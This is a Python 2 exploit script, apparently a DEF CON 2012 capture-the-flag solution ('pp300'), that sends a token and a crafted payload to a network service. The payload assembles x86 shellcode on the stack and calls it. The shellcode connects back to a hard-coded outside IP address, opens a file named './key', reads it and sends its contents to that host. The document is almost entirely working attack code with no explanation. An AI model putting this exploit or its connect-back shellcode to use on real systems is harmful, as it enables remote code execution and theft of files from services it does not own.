defcon20 pp300 exploit

#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

def make_payload(scode):
    #padding 1 byte : shellcode length 79byte
    scode += "\x90"

    #move byte ptr ss:[ebp+x], shellcode 1 byte
    mov_byte_ptr = "\xc6\x45"    
    tmp = ''
    count = 0
    for x in scode:
        tmp += mov_byte_ptr + chr(count) + x
        count += 0x1

    #call ebp
    call_ebp = "\xff\xd5\x90\xff"
    return tmp + call_ebp
    
    
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"
port = 7548

num = "3c56bc31268ac65f" + "\x0a"

#make payload
payload = make_payload(scode)

s = make_connection(host,port) 
s.send(num)
s.send(payload)